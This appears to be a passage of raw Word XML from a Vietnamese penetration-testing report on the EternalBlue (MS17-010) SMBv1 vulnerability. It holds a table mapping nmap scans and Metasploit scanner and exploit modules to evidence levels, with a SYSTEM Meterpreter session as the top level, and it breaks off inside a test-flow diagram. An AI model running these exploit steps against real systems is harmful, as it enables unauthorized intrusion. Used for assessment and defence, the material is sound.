    <w:p w14:paraId="6CE86E96" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense Breakpoint:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bị bẻ gãy khi cài đặt bản vá KB4012212 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>V = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1</w:t>
      </w:r>
      <w:r>
        <w:t>), tắt SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_2</w:t>
      </w:r>
      <w:r>
        <w:t>), hoặc chặn tường lửa (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE767C8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.3: Bảng đối chiếu các kỹ thuật kiểm thử với các tiền điều kiện và 4 cấp độ trạng thái</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="659"/>
        <w:gridCol w:w="3679"/>
        <w:gridCol w:w="732"/>
        <w:gridCol w:w="659"/>
        <w:gridCol w:w="3271"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="1D18C124" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="67851DB9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Kỹ thuật kiểm thử</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="78D239A4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Công cụ thực thi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="33FA36F3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tiền điều kiện kiểm chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="211AD12F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cấp độ đối chiếu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="1CD7C7CD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bằng chứng kỹ thuật cốt lõi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="2B276B22" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="59B6485C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4102D9CC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>nmap -sS -sV -p 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="256A41ED" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>R, S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="786FDA44" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7615533E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Gói tin phản hồi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SYN-ACK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, định danh dịch vụ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>microsoft-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="35FA78CD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2245C9B3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6A57A367" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>nmap --script smb-protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3F249C48" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7A8C4547" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="724AADCD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Bản tin chấp nhận phương ngữ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>NT LM 0.12 (SMBv1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="3C05E1C4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64F91687" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42E232E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>nmap --script smb-vuln-ms17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7AC6A28C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3156D9A2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6BE7F098" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Mã lỗi NT Status phản hồi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>STATUS_INSUFF_SERVER_RESOURCES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0xC0000205</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="1AEB8AF8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="48B3016E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="164AC203" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>auxiliary/scanner/smb/smb_ms17_010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4D01B9E4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="564540A2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="39CD7AC4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Log xác nhận đối chứng độc lập từ Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="33748BE8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="593F16CC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kỹ thuật 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="645A6D9E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exploit/.../ms17_010_eternalblue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C2C3A9C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>E, C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47D1684F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="479B7F6E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Phiên Meterpreter quyền </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SYSTEM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (BSOD bị tính là FAIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1928212B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="338D38F3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sơ đồ 2.2 mô tả tuần tự luồng kiểm thử nhân quả và sự tương tác giữa các kỹ thuật:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="515BF027" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4BCEA34F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[Trạm kiểm thử: Kali Linux]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |---&gt; (1) Kỹ thuật 1: Kiểm chứng R &amp; S (Cổng 445 mở / microsoft-ds?)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |     [Thất bại: Dừng -&gt; R=0 hoặc S=0] ---&gt; Thành công (Cấp độ 1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |---&gt; (2) Kỹ thuật 2: Kiểm chứng D (Chấp nhận dialect NT LM 0.12?)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |     [Thất bại: Dừng -&gt; D=0] -----------&gt; Thành công (Cấp độ 2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
